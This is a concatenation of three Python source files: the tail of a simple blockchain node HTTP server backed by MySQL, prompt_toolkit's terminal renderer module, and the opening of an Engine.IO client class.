")"
with conn.cursor() as curs:
curs.execute(sql)
print("Success to create nodelist table " + DATABASE_ND_TABLE + " on " + DATABASE_SVR_NAME)
except:
print("Failed to create nodelist table " + DATABASE_ND_TABLE + " on " + DATABASE_SVR_NAME)
finally:
conn.close()
#Ask to insert your ip address and port number into the server that manages the list of miners.
serverData = []
query = "/serverList/add"
URL = DATABASE_MINER_LIST_IP + ":" + str(DATABASE_MINER_LIST_PORT) + query
portDict = {"port" : PORT_NUMBER}
try:
print("Trying to add my ip and port to serverList : " + DATABASE_MINER_LIST_IP + ":" + str(DATABASE_MINER_LIST_PORT) + "...........")
res = requests.get(URL, params=portDict)
if res.status_code == 200:
serverData = json.loads(res.text)
print("sent ok.")
else:
print(URL + " responding error " + 404)
except:
print("serverlist Server " + URL + " is not responding.")
if serverData[-1] == 'success' :
print("Suceed regstering my ip and port to serverlist database.")
elif serverData[-1] == 'exist' :
print("My ip and port already exist on serverlist database.")
else :
print("Failed regstering my ip and port to serverlist database.")
#Synchronize the table of blockchain and the table of the nodelist sequentially with
#all servers in the server table of the server list server.
#The rule is that a server with the largest amount of data has highly reliable data.
if not isMasterSvr :
#blockchain table
myBlockCount = 0
conn = pymysql.connect(host=DATABASE_SVR_IP, port=DATABASE_SVR_PORT, user=DATABASE_SVR_USER,
password=DATABASE_SVR_PW, \
db=DATABASE_SVR_NAME, charset='utf8')
sql = "SELECT COUNT(*) FROM " + DATABASE_BC_TABLE
try:
with conn.cursor() as curs:
curs.execute(sql)
myBlockCount = curs.fetchone()
print("Success to get blockchain rowCount from my database, count >> " + str(myBlockCount[0]))
except:
print("Failed to get blockchain rowCount from my database >>" + DATABASE_SVR_IP + " : " + str(
DATABASE_SVR_PORT) + " : " + DATABASE_SVR_NAME)
finally:
conn.close()
query = "/serverList/get"
try:
print("Trying to get serverData from serverlist database...........")
URL = DATABASE_MINER_LIST_IP + ":" + str(DATABASE_MINER_LIST_PORT) + query
print("Trying to send : " + URL)
res = requests.get(URL)
if res.status_code == 200:
print("sent ok.")
resServerDictData = json.loads(res.text)
print(str(resServerDictData))
else:
print("Failed to access serverlist >> not responding : 404")
except:
print("Failed to access serverlist >> not responding")
if myBlockCount[0] == 0:
maxBlockCount = 0
try:
blocklist = []
for i in resServerDictData:
if IP_NUMBER == i['ip'] and str(PORT_NUMBER) == i['port'] :
continue
else :
print("Trying to get blockchain data from table on " + i['ip'] + ":" + i['port'] + "...........")
URL = "http://" + i['ip'] + ":" + str(i['port']) + "/block/getBlockData"
res = requests.get(URL)
if res.status_code == 200:
print("Success to get blockchain data")
resBlockDictData = json.loads(res.text)
if resBlockDictData[-1] == "no data exists" :
resBlockDictData = []
if len(resBlockDictData) > maxBlockCount:
for line in resBlockDictData:
block = Block(line['index'], line['previousHash'], line['timestamp'], line['data'],
line['currentHash'],
line['proof'], line['merkleHash'])
blocklist.append(block)
writeAllBlockchain(blocklist)
maxBlockCount = len(blocklist)
else:
print("Failed to get blockchain data from " + i['ip'] + ":" + str(i['port']))
except:
print("Failed to access serverlist >> not responding")
else :
pass
#nodelist table
myNnodeCount = 0
conn = pymysql.connect(host=DATABASE_SVR_IP, port=DATABASE_SVR_PORT, user=DATABASE_SVR_USER,
password=DATABASE_SVR_PW, \
db=DATABASE_SVR_NAME, charset='utf8')
sql = "SELECT COUNT(*) FROM " + DATABASE_ND_TABLE
try:
with conn.cursor() as curs:
curs.execute(sql)
myNnodeCount = curs.fetchone()
print("Success to get node rowCount from my database, count >> " + str(myNnodeCount[0]))
except:
print("Failed to get nodelist from my database >> " + DATABASE_SVR_IP + " : " + str(DATABASE_SVR_PORT) + " : " + DATABASE_SVR_NAME)
finally:
conn.close()
if myNnodeCount[0] == 0 :
maxNodeCount = 0
try:
nodeList = []
for i in resServerDictData:
if IP_NUMBER == i['ip'] and str(PORT_NUMBER) == i['port'] :
continue
else :
print("Trying to get node data from table on " + i['ip'] + ":" + i['port'] + "...........")
URL = "http://" + i['ip'] + ":" + i['port'] + "/node/getNode"
res = requests.get(URL)
if res.status_code == 200:
print("Success to get node data")
resNodeDictData = json.loads(res.text)
for line in resNodeDictData:
node = Node(line[0], line[1], line[2])
nodeList.append(node)
if len(nodeList) >= maxNodeCount:
maxNodeCount = len(nodeList)
conn = pymysql.connect(host=DATABASE_SVR_IP, port=DATABASE_SVR_PORT,
user=DATABASE_SVR_USER,
passwd=DATABASE_SVR_PW, \
database=DATABASE_SVR_NAME, charset='utf8')
try:
for node in nodeList:
print("Trying to write node data on my database...........")
with conn.cursor() as curs:
sql = "INSERT INTO " + DATABASE_ND_TABLE + " VALUES (%s,%s,%s)"
curs.execute(sql, (node.ip, node.port, node.tryConnect))
conn.commit()
print("Success to write node data on my database")
except:
print("Failed to write node data on my database")
finally:
conn.close()
else:
print("Failed to get node data from " + i['ip'] + ":" + i['port'])
except:
print("Failed to access serverlist >> not responding")
else:
pass
print("initSvr setting Done.........")
return 1
# This class will handle any incoming request from
# a browser
class myHandler(BaseHTTPRequestHandler):
# def __init__(self, request, client_address, server):
# BaseHTTPRequestHandler.__init__(self, request, client_address, server)
# Handler for the GET requests
def do_GET(self):
data = [] # response json data
if None != re.search('/block/*', self.path):
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
if None != re.search('/block/getBlockData', self.path):
blockList, readSuccess = readBlockchain()
if blockList == [] and readSuccess:
print("No Block Exists")
data.append("no data exists")
else:
for i in blockList:
print(i.__dict__)
data.append(i.__dict__)
self.wfile.write(bytes(json.dumps(data, sort_keys=True, indent=4), "utf-8"))
elif None != re.search('/block/generateBlock', self.path):
t = threading.Thread(target=mine)
t.start()
data.append("{mining is underway:check later by calling /block/getBlockData}")
self.wfile.write(bytes(json.dumps(data, sort_keys=True, indent=4), "utf-8"))
else:
data.append("{info:no such api}")
self.wfile.write(bytes(json.dumps(data, sort_keys=True, indent=4), "utf-8"))
elif None != re.search('/node/*', self.path):
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
if None != re.search('/node/addNode', self.path):
queryDict =[{'ip' : self.client_address[0],'port':self.client_address[1]}]
res = addNode(queryDict, mode = 'new')
if res == 1:
importedNodes = readNodes()
data = importedNodes
print("node added okay")
elif res == 0:
data.append("caught exception while saving")
elif res == -1:
importedNodes = readNodes()
data = importedNodes
data.append("requested node is already exists")
self.wfile.write(bytes(json.dumps(data, sort_keys=True, indent=4), "utf-8"))
elif None != re.search('/node/getNode', self.path):
importedNodes = readNodes()
data = importedNodes
self.wfile.write(bytes(json.dumps(data, sort_keys=True, indent=4), "utf-8"))
else:
self.send_response(403)
self.send_header('Content-Type', 'application/json')
self.end_headers()
# ref : https://mafayyaz.wordpress.com/2013/02/08/writing-simple-http-server-in-python-with-rest-and-json/
def do_POST(self):
if None != re.search('/postBlock/*', self.path):
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
if None != re.search('/postBlock/validateBlock', self.path):
ctype, pdict = cgi.parse_header(self.headers['content-type'])
# print(ctype) #print(pdict)
if ctype == 'application/json':
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length)
receivedData = post_data.decode('utf-8')
print(type(receivedData))
tempDictList = json.loads(receivedData) # load your str into a list #print(type(tempDict))
for tempDict in tempDictList :
newBlock = Block(tempDict['index'], tempDict['previousHash'], tempDict['timestamp'], tempDict['data'], tempDict['currentHash'], \
tempDict['proof'], tempDict['merkleHash'])
blockList, readSuccess = readBlockchain()
if len(blockList) > 0:
previousBlock = getLatestBlock(blockList)
if isValidNewBlock(newBlock, previousBlock) == True:
tempDict['validationResult'] = 'normal'
result = writeBlockchain(newBlock)
if result == 1 :
print("Succeed to insert new block on database.")
tempDict['validationResult'] = 'normal'
else :
print("Failed to insert new block on database.")
tempDict['validationResult'] = 'abnormal'
else:
tempDict['validationResult'] = 'abnormal'
else :
result = writeBlockchain(newBlock)
if result == 1:
print("Succeed to insert new block on database.")
tempDict['validationResult'] = 'normal'
else:
print("Failed to insert new block on database.")
tempDict['validationResult'] = 'abnormal'
self.wfile.write(bytes(json.dumps(tempDict), "utf-8"))
if None != re.search('/postBlock/sync', self.path):
ctype, pdict = cgi.parse_header(self.headers['content-type'])
if ctype == 'application/json':
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length)
receivedData = post_data.decode('utf-8')
tempDict = json.loads(receivedData) # load your str into a list
print(tempDict)
res = compareMerge(tempDict)
if res == -2: # internal error
tempDict.append("block chain info incorrect")
elif res == -1: # block chain info incorrect
tempDict.append("internal server error")
elif res == 1: # normal
tempDict.append("accepted")
elif res == 2: # identical
tempDict.append("already updated")
elif res == 3: # we have a longer chain
# 3을 받으면 tempDict를 초기화 하여 내 블록데이터 넣고 전송
blockList, isSuccess = readBlockchain()
tempDict = []
for line in blockList:
tempDict.append(line.__dict__)
tempDict.append("we have a better chain")
self.wfile.write(bytes(json.dumps(tempDict), "utf-8"))
elif None != re.search('/postNode/*', self.path):
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
if None != re.search('/postNode/newSvr', self.path):
ctype, pdict = cgi.parse_header(self.headers['content-type'])
print("get response")
if ctype == 'application/json':
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length)
receivedData = post_data.decode('utf-8')
tempDict = json.loads(receivedData) # load your str into a list
if addNode(tempDict, mode='sync') == 1:
self.wfile.write(bytes(json.dumps(tempDict), "utf-8"))
else:
tempDict.append("error : cannot add node to sync")
self.wfile.write(bytes(json.dumps(tempDict), "utf-8"))
else:
self.send_response(404)
self.send_header('Content-Type', 'application/json')
self.end_headers()
return
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
try:
# Create a web server and define the handler to manage the
# incoming request
# server = HTTPServer(('', PORT_NUMBER), myHandler)
server = ThreadedHTTPServer(('', PORT_NUMBER), myHandler)
print('Started httpserver on port ', PORT_NUMBER)
initSvr()
# Wait forever for incoming http requests
server.serve_forever()
except (KeyboardInterrupt, Exception) as e:
print('^C received, shutting down the web server')
print(e)
server.socket.close()
|
renderer.py
|
"""
Renders the command line on the console.
(Redraws parts of the input line that were changed.)
"""
from __future__ import unicode_literals
from prompt_toolkit.eventloop import Future, From, ensure_future, get_event_loop
from prompt_toolkit.filters import to_filter
from prompt_toolkit.formatted_text import to_formatted_text
from prompt_toolkit.layout.mouse_handlers import MouseHandlers
from prompt_toolkit.layout.screen import Point, Screen, WritePosition
from prompt_toolkit.output import Output, ColorDepth
from prompt_toolkit.styles import BaseStyle, DummyStyleTransformation, StyleTransformation
from prompt_toolkit.utils import is_windows
from collections import deque
from six.moves import range
import time
import threading
__all__ = [
'Renderer',
'print_formatted_text',
]
def _output_screen_diff(app, output, screen, current_pos, color_depth,
previous_screen=None, last_style=None, is_done=False,
full_screen=False, attrs_for_style_string=None,
size=None, previous_width=0): # XXX: drop is_done
"""
Render the diff between this screen and the previous screen.
This takes two `Screen` instances. The one that represents the output like
it was during the last rendering and one that represents the current
output raster. Looking at these two `Screen` instances, this function will
render the difference by calling the appropriate methods of the `Output`
object that only paint the changes to the terminal.
This is some performance-critical code which is heavily optimized.
Don't change things without profiling first.
:param current_pos: Current cursor position.
:param last_style: The style string, used for drawing the last drawn
character. (Color/attributes.)
:param attrs_for_style_string: :class:`._StyleStringToAttrsCache` instance.
:param width: The width of the terminal.
:param previous_width: The width of the terminal during the last rendering.
"""
width, height = size.columns, size.rows
#: Remember the last printed character.
last_style = [last_style] # nonlocal
#: Variable for capturing the output.
write = output.write
write_raw = output.write_raw
# Create locals for the most used output methods.
# (Save expensive attribute lookups.)
_output_set_attributes = output.set_attributes
_output_reset_attributes = output.reset_attributes
_output_cursor_forward = output.cursor_forward
_output_cursor_up = output.cursor_up
_output_cursor_backward = output.cursor_backward
# Hide cursor before rendering. (Avoid flickering.)
output.hide_cursor()
def reset_attributes():
" Wrapper around Output.reset_attributes. "
_output_reset_attributes()
last_style[0] = None # Forget last char after resetting attributes.
def move_cursor(new):
" Move cursor to this `new` point. Returns the given Point. "
current_x, current_y = current_pos.x, current_pos.y
if new.y > current_y:
# Use newlines instead of CURSOR_DOWN, because this might add new lines.
# CURSOR_DOWN will never create new lines at the bottom.
# Also reset attributes, otherwise the newline could draw a
# background color.
reset_attributes()
write('\r\n' * (new.y - current_y))
current_x = 0
_output_cursor_forward(new.x)
return new
elif new.y < current_y:
_output_cursor_up(current_y - new.y)
if current_x >= width - 1:
write('\r')
_output_cursor_forward(new.x)
elif new.x < current_x or current_x >= width - 1:
_output_cursor_backward(current_x - new.x)
elif new.x > current_x:
_output_cursor_forward(new.x - current_x)
return new
def output_char(char):
"""
Write the output of this character.
"""
# If the last printed character has the same style, don't output the
# style again.
the_last_style = last_style[0] # Either `None` or a style string.
if the_last_style == char.style:
write(char.char)
else:
# Look up `Attr` for this style string. Only set attributes if different.
# (Two style strings can still have the same formatting.)
# Note that an empty style string can have formatting that needs to
# be applied, because of style transformations.
new_attrs = attrs_for_style_string[char.style]
if not the_last_style or new_attrs != attrs_for_style_string[the_last_style]:
_output_set_attributes(new_attrs, color_depth)
write(char.char)
last_style[0] = char.style
# Render for the first time: reset styling.
if not previous_screen:
reset_attributes()
# Disable autowrap. (When entering a the alternate screen, or anytime when
# we have a prompt. - In the case of a REPL, like IPython, people can have
# background threads, and it's hard for debugging if their output is not
# wrapped.)
if not previous_screen or not full_screen:
output.disable_autowrap()
# When the previous screen has a different size, redraw everything anyway.
# Also when we are done. (We might take up less rows, so clearing is important.)
if is_done or not previous_screen or previous_width != width: # XXX: also consider height??
current_pos = move_cursor(Point(x=0, y=0))
reset_attributes()
output.erase_down()
previous_screen = Screen()
# Get height of the screen.
# (height changes as we loop over data_buffer, so remember the current value.)
# (Also make sure to clip the height to the size of the output.)
current_height = min(screen.height, height)
# Loop over the rows.
row_count = min(max(screen.height, previous_screen.height), height)
c = 0 # Column counter.
for y in range(row_count):
new_row = screen.data_buffer[y]
previous_row = previous_screen.data_buffer[y]
zero_width_escapes_row = screen.zero_width_escapes[y]
new_max_line_len = min(width - 1, max(new_row.keys()) if new_row else 0)
previous_max_line_len = min(width - 1, max(previous_row.keys()) if previous_row else 0)
# Loop over the columns.
c = 0
while c < new_max_line_len + 1:
new_char = new_row[c]
old_char = previous_row[c]
char_width = (new_char.width or 1)
# When the old and new character at this position are different,
# draw the output. (Because of the performance, we don't call
# `Char.__ne__`, but inline the same expression.)
if new_char.char != old_char.char or new_char.style != old_char.style:
current_pos = move_cursor(Point(x=c, y=y))
# Send injected escape sequences to output.
if c in zero_width_escapes_row:
write_raw(zero_width_escapes_row[c])
output_char(new_char)
current_pos = Point(x=current_pos.x + char_width, y=current_pos.y)
c += char_width
# If the new line is shorter, trim it.
if previous_screen and new_max_line_len < previous_max_line_len:
current_pos = move_cursor(Point(x=new_max_line_len + 1, y=y))
reset_attributes()
output.erase_end_of_line()
# Correctly reserve vertical space as required by the layout.
# When this is a new screen (drawn for the first time), or for some reason
# higher than the previous one. Move the cursor once to the bottom of the
# output. That way, we're sure that the terminal scrolls up, even when the
# lower lines of the canvas just contain whitespace.
# The most obvious reason that we actually want this behaviour is the avoid
# the artifact of the input scrolling when the completion menu is shown.
# (If the scrolling is actually wanted, the layout can still be build in a
# way to behave that way by setting a dynamic height.)
if current_height > previous_screen.height:
current_pos = move_cursor(Point(x=0, y=current_height - 1))
# Move cursor:
if is_done:
current_pos = move_cursor(Point(x=0, y=current_height))
output.erase_down()
else:
current_pos = move_cursor(
screen.get_cursor_position(app.layout.current_window))
if is_done or not full_screen:
output.enable_autowrap()
# Always reset the color attributes. This is important because a background
# thread could print data to stdout and we want that to be displayed in the
# default colors. (Also, if a background color has been set, many terminals
# give weird artifacts on resize events.)
reset_attributes()
if screen.show_cursor or is_done:
output.show_cursor()
return current_pos, last_style[0]
class HeightIsUnknownError(Exception):
" Information unavailable. Did not yet receive the CPR response. "
class _StyleStringToAttrsCache(dict):
"""
A cache structure that maps style strings to :class:`.Attr`.
(This is an important speed up.)
"""
def __init__(self, get_attrs_for_style_str, style_transformation):
assert callable(get_attrs_for_style_str)
assert isinstance(style_transformation, StyleTransformation)
self.get_attrs_for_style_str = get_attrs_for_style_str
self.style_transformation = style_transformation
def __missing__(self, style_str):
attrs = self.get_attrs_for_style_str(style_str)
attrs = self.style_transformation.transform_attrs(attrs)
self[style_str] = attrs
return attrs
class CPR_Support(object):
" Enum: whether or not CPR is supported. "
SUPPORTED = 'SUPPORTED'
NOT_SUPPORTED = 'NOT_SUPPORTED'
UNKNOWN = 'UNKNOWN'
class Renderer(object):
"""
Typical usage:
::
output = Vt100_Output.from_pty(sys.stdout)
r = Renderer(style, output)
r.render(app, layout=...)
"""
CPR_TIMEOUT = 2 # Time to wait until we consider CPR to be not supported.
def __init__(self, style, output, full_screen=False, mouse_support=False, cpr_not_supported_callback=None):
assert isinstance(style, BaseStyle)
assert isinstance(output, Output)
assert callable(cpr_not_supported_callback) or cpr_not_supported_callback is None
self.style = style
self.output = output
self.full_screen = full_screen
self.mouse_support = to_filter(mouse_support)
self.cpr_not_supported_callback = cpr_not_supported_callback
self._in_alternate_screen = False
self._mouse_support_enabled = False
self._bracketed_paste_enabled = False
# Future set when we are waiting for a CPR flag.
self._waiting_for_cpr_futures = deque()
self.cpr_support = CPR_Support.UNKNOWN
# Cache for the style.
self._attrs_for_style = None
self._last_style_hash = None
self._last_transformation_hash = None
self._last_color_depth = None
self.reset(_scroll=True)
def reset(self, _scroll=False, leave_alternate_screen=True):
# Reset position
self._cursor_pos = Point(x=0, y=0)
# Remember the last screen instance between renderers. This way,
# we can create a `diff` between two screens and only output the
# difference. It's also to remember the last height. (To show for
# instance a toolbar at the bottom position.)
self._last_screen = None
self._last_size = None
self._last_style = None
# Default MouseHandlers. (Just empty.)
self.mouse_handlers = MouseHandlers()
#: Space from the top of the layout, until the bottom of the terminal.
#: We don't know this until a `report_absolute_cursor_row` call.
self._min_available_height = 0
# In case of Windows, also make sure to scroll to the current cursor
# position. (Only when rendering the first time.)
if is_windows() and _scroll:
self.output.scroll_buffer_to_prompt()
# Quit alternate screen.
if self._in_alternate_screen and leave_alternate_screen:
self.output.quit_alternate_screen()
self._in_alternate_screen = False
# Disable mouse support.
if self._mouse_support_enabled:
self.output.disable_mouse_support()
self._mouse_support_enabled = False
# Disable bracketed paste.
if self._bracketed_paste_enabled:
self.output.disable_bracketed_paste()
self._bracketed_paste_enabled = False
# Flush output. `disable_mouse_support` needs to write to stdout.
self.output.flush()
@property
def last_rendered_screen(self):
"""
The `Screen` class that was generated during the last rendering.
This can be `None`.
"""
return self._last_screen
@property
def height_is_known(self):
"""
True when the height from the cursor until the bottom of the terminal
is known. (It's often nicer to draw bottom toolbars only if the height
is known, in order to avoid flickering when the CPR response arrives.)
"""
return self.full_screen or self._min_available_height > 0 or \
is_windows() # On Windows, we don't have to wait for a CPR.
@property
def rows_above_layout(self):
"""
Return the number of rows visible in the terminal above the layout.
"""
if self._in_alternate_screen:
return 0
elif self._min_available_height > 0:
total_rows = self.output.get_size().rows
last_screen_height = self._last_screen.height if self._last_screen else 0
return total_rows - max(self._min_available_height, last_screen_height)
else:
raise HeightIsUnknownError('Rows above layout is unknown.')
def request_absolute_cursor_position(self):
"""
Get current cursor position.
We do this to calculate the minimum available height that we can
consume for rendering the prompt. This is the available space below te
cursor.
For vt100: Do CPR request. (answer will arrive later.)
For win32: Do API call. (Answer comes immediately.)
"""
# Only do this request when the cursor is at the top row. (after a
# clear or reset). We will rely on that in `report_absolute_cursor_row`.
assert self._cursor_pos.y == 0
# In full-screen mode, always use the total height as min-available-height.
if self.full_screen:
self._min_available_height = self.output.get_size().rows
# For Win32, we have an API call to get the number of rows below the
# cursor.
elif is_windows():
self._min_available_height = self.output.get_rows_below_cursor_position()
# Use CPR.
else:
if self.cpr_support == CPR_Support.NOT_SUPPORTED:
return
def do_cpr():
# Asks for a cursor position report (CPR).
self._waiting_for_cpr_futures.append(Future())
self.output.ask_for_cpr()
if self.cpr_support == CPR_Support.SUPPORTED:
do_cpr()
# If we don't know whether CPR is supported, only do a request if
# none is pending, and test it, using a timer.
elif self.cpr_support == CPR_Support.UNKNOWN and not self.waiting_for_cpr:
do_cpr()
def timer():
time.sleep(self.CPR_TIMEOUT)
# Not set in the meantime -> not supported.
if self.cpr_support == CPR_Support.UNKNOWN:
self.cpr_support = CPR_Support.NOT_SUPPORTED
if self.cpr_not_supported_callback:
# Make sure to call this callback in the main thread.
get_event_loop().call_from_executor(self.cpr_not_supported_callback)
t = threading.Thread(target=timer)
t.daemon = True
t.start()
def report_absolute_cursor_row(self, row):
"""
To be called when we know the absolute cursor position.
(As an answer of a "Cursor Position Request" response.)
"""
self.cpr_support = CPR_Support.SUPPORTED
# Calculate the amount of rows from the cursor position until the
# bottom of the terminal.
total_rows = self.output.get_size().rows
rows_below_cursor = total_rows - row + 1
# Set the minimum available height.
self._min_available_height = rows_below_cursor
# Pop and set waiting for CPR future.
try:
f = self._waiting_for_cpr_futures.popleft()
except IndexError:
pass # Received CPR response without having a CPR.
else:
f.set_result(None)
@property
def waiting_for_cpr(self):
"""
Waiting for CPR flag. True when we send the request, but didn't got a
response.
"""
return bool(self._waiting_for_cpr_futures)
def wait_for_cpr_responses(self, timeout=1):
"""
Wait for a CPR response.
"""
cpr_futures = list(self._waiting_for_cpr_futures) # Make copy.
# When there are no CPRs in the queue. Don't do anything.
if not cpr_futures or self.cpr_support == CPR_Support.NOT_SUPPORTED:
return Future.succeed(None)
f = Future()
# When a CPR has been received, set the result.
def wait_for_responses():
for response_f in cpr_futures:
yield From(response_f)
if not f.done():
f.set_result(None)
ensure_future(wait_for_responses())
# Timeout.
def wait_for_timeout():
time.sleep(timeout)
# Got timeout.
if not f.done():
self._waiting_for_cpr_futures = deque()
f.set_result(None)
t = threading.Thread(target=wait_for_timeout)
t.daemon = True
t.start()
return f
def render(self, app, layout, is_done=False):
"""
Render the current interface to the output.
:param is_done: When True, put the cursor at the end of the interface. We
won't print any changes to this part.
"""
output = self.output
# Enter alternate screen.
if self.full_screen and not self._in_alternate_screen:
self._in_alternate_screen = True
output.enter_alternate_screen()
# Enable bracketed paste.
if not self._bracketed_paste_enabled:
self.output.enable_bracketed_paste()
self._bracketed_paste_enabled = True
# Enable/disable mouse support.
needs_mouse_support = self.mouse_support()
if needs_mouse_support and not self._mouse_support_enabled:
output.enable_mouse_support()
self._mouse_support_enabled = True
elif not needs_mouse_support and self._mouse_support_enabled:
output.disable_mouse_support()
self._mouse_support_enabled = False
# Create screen and write layout to it.
size = output.get_size()
screen = Screen()
screen.show_cursor = False # Hide cursor by default, unless one of the
# containers decides to display it.
mouse_handlers = MouseHandlers()
# Calculate height.
if self.full_screen:
height = size.rows
elif is_done:
# When we are done, we don't necessary want to fill up until the bottom.
height = layout.container.preferred_height(size.columns, size.rows).preferred
else:
last_height = self._last_screen.height if self._last_screen else 0
height = max(self._min_available_height,
last_height,
layout.container.preferred_height(size.columns, size.rows).preferred)
height = min(height, size.rows)
# When te size changes, don't consider the previous screen.
if self._last_size != size:
self._last_screen = None
# When we render using another style or another color depth, do a full
# repaint. (Forget about the previous rendered screen.)
# (But note that we still use _last_screen to calculate the height.)
if (self.style.invalidation_hash() != self._last_style_hash or
app.style_transformation.invalidation_hash() != self._last_transformation_hash or
app.color_depth != self._last_color_depth):
self._last_screen = None
self._attrs_for_style = None
if self._attrs_for_style is None:
self._attrs_for_style = _StyleStringToAttrsCache(
self.style.get_attrs_for_style_str,
app.style_transformation)
self._last_style_hash = self.style.invalidation_hash()
self._last_transformation_hash = app.style_transformation.invalidation_hash()
self._last_color_depth = app.color_depth
layout.container.write_to_screen(screen, mouse_handlers, WritePosition(
xpos=0,
ypos=0,
width=size.columns,
height=height,
), parent_style='', erase_bg=False, z_index=None)
screen.draw_all_floats()
# When grayed. Replace all styles in the new screen.
if app.exit_style:
screen.append_style_to_content(app.exit_style)
# Process diff and write to output.
self._cursor_pos, self._last_style = _output_screen_diff(
app, output, screen, self._cursor_pos, app.color_depth,
self._last_screen, self._last_style, is_done,
full_screen=self.full_screen,
attrs_for_style_string=self._attrs_for_style, size=size,
previous_width=(self._last_size.columns if self._last_size else 0))
self._last_screen = screen
self._last_size = size
self.mouse_handlers = mouse_handlers
output.flush()
# Set visible windows in layout.
app.layout.visible_windows = screen.visible_windows
if is_done:
self.reset()
def erase(self, leave_alternate_screen=True):
"""
Hide all output and put the cursor back at the first line. This is for
instance used for running a system command (while hiding the CLI) and
later resuming the same CLI.)
:param leave_alternate_screen: When True, and when inside an alternate
screen buffer, quit the alternate screen.
"""
output = self.output
output.cursor_backward(self._cursor_pos.x)
output.cursor_up(self._cursor_pos.y)
output.erase_down()
output.reset_attributes()
output.enable_autowrap()
output.flush()
self.reset(leave_alternate_screen=leave_alternate_screen)
def clear(self):
"""
Clear screen and go to 0,0
"""
# Erase current output first.
self.erase()
# Send "Erase Screen" command and go to (0, 0).
output = self.output
output.erase_screen()
output.cursor_goto(0, 0)
output.flush()
self.request_absolute_cursor_position()
def print_formatted_text(
output, formatted_text, style, style_transformation=None,
color_depth=None):
"""
Print a list of (style_str, text) tuples in the given style to the output.
"""
assert isinstance(output, Output)
assert isinstance(style, BaseStyle)
assert style_transformation is None or isinstance(style_transformation, StyleTransformation)
assert color_depth is None or color_depth in ColorDepth._ALL
fragments = to_formatted_text(formatted_text)
style_transformation = style_transformation or DummyStyleTransformation()
color_depth = color_depth or ColorDepth.default()
# Reset first.
output.reset_attributes()
output.enable_autowrap()
# Print all (style_str, text) tuples.
attrs_for_style_string = _StyleStringToAttrsCache(
style.get_attrs_for_style_str,
style_transformation)
for style_str, text in fragments:
attrs = attrs_for_style_string[style_str]
if attrs:
output.set_attributes(attrs, color_depth)
else:
output.reset_attributes()
# Assume that the output is raw, and insert a carriage return before
# every newline. (Also important when the front-end is a telnet client.)
assert '\r' not in text
output.write(text.replace('\n', '\r\n'))
# Reset again.
output.reset_attributes()
output.flush()
|
client.py
|
from base64 import b64encode
import logging
try:
import queue
except ImportError: # pragma: no cover
import Queue as queue
import signal
import ssl
import threading
import time
import six
from six.moves import urllib
try:
import requests
except ImportError: # pragma: no cover
requests = None
try:
import websocket
except ImportError: # pragma: no cover
websocket = None
from . import exceptions
from . import packet
from . import payload
default_logger = logging.getLogger('engineio.client')
connected_clients = []
if six.PY2: # pragma: no cover
ConnectionError = OSError
def signal_handler(sig, frame):
"""SIGINT handler.
Disconnect all active clients and then invoke the original signal handler.
"""
for client in connected_clients[:]:
if not client.is_asyncio_based():
client.disconnect()
if callable(original_signal_handler):
return original_signal_handler(sig, frame)
else: # pragma: no cover
# Handle case where no original SIGINT handler was present.
return signal.default_int_handler(sig, frame)
original_signal_handler = None
class Client(object):
"""An Engine.IO client.
This class implements a fully compliant Engine.IO web client with support
for websocket and long-polling transports.
:param logger: To enable logging set to ``True`` or pass a logger object to
use. To disable logging set to ``False``. The default is
``False``. Note that fatal errors are logged even when
``logger`` is ``False``.
:param json: An alternative json module to use for encoding and decoding
packets. Custom json modules must have ``dumps`` and ``loads``
functions that are compatible with the standard library
versions.
:param request_timeout: A timeout in seconds for requests. The default is
5 seconds.
:param http_session: an initialized ``requests.Session`` object to be used
when sending requests to the server. Use it if you
need to add special client options such as proxy
servers, SSL certificates, etc.
:param ssl_verify: ``True`` to verify SSL certificates, or ``False`` to
skip SSL certificate verification, allowing
connections to servers with self signed certificates.
The default is ``True``.
"""
event_names = ['connect', 'disconnect', 'message']
def __init__(self,
logger=False,
json=None,
request_timeout=5,
http_session=None,
ssl_verify=True):
global original_signal_handler
if original_signal_handler is None and \
threading.current_thread() == threading.main_thread():
original_signal_handler = signal.signal(signal.SIGINT,
signal_handler)
self.handlers = {}
self.base_url = None
self.transports = None
self.current_transport = None
self.sid = None
self.upgrades = None
self.ping_interval = None
self.ping_timeout = None
self.pong_received = True
self.http = http_session
self.ws = None
self.read_loop_task = None
self.write_loop_task = None
self.ping_loop_task = None
self.ping_loop_event = None
self.queue = None
self.state = 'disconnected'
self.ssl_verify = ssl_verify
if json is not None:
packet.Packet.json = json
if not isinstance(logger, bool):
self.logger = logger
else:
self.logger = default_logger
if not logging.root.handlers and \
self.logger.level == logging.NOTSET:
if logger:
self.logger.setLevel(logging.INFO)
else:
self.logger.setLevel(logging.ERROR)
self.logger.addHandler(logging.StreamHandler())
self.request_timeout = request_timeout
def is_asyncio_based(self):
return False
def on(self, event, handler=None):
"""Register an event handler.
:param event: The event name. Can be ``'connect'``, ``'message'`` or
``'disconnect'``.
:param handler: The function that should be invoked to handle the
event. When this parameter is not given, the method
acts as a decorator for the handler function.
Example usage::
# as a decorator:
@eio.on('connect')
def connect_handler():
print('Connection request')
# as a method:
def message_handler(msg):
print('Received message: ', msg)
eio.send('response')
eio.on('message', message_handler)
"""
if event not in self.event_names:
raise ValueError('Invalid event')
def set_handler(handler):
self.handlers[event] = handler
return handler
if handler is None:
return set_handler
set_handler(handler)
def connect(self, url, headers=None, transports=None,
engineio_path='engine.io'):
"""Connect to an Engine.IO server.
:param url: The URL of the Engine.IO server. It can include custom
query string parameters if required by the server.
:param headers: A dictionary with custom headers to send with the
connection request.
:param transports: The list of allowed transports. Valid transports
are ``'polling'`` and ``'websocket'``. If not
given, the polling transport is connected first,
then an upgrade to websocket is attempted.
:param engineio_path: The endpoint where the Engine.IO server is
installed. The default value is appropriate for
most cases.
Example usage::
eio = engineio.Client()
eio.connect('http://localhost:5000')
"""
if self.state != 'disconnected':
raise ValueError('Client is not in a disconnected state')
valid_transports = ['polling', 'websocket']
if transports is not None:
if isinstance(transports, six.string_types):
transports = [transports]
transports = [transport for transport in transports
if transport in valid_transports]
if not transports:
raise ValueError('No valid transports provided')
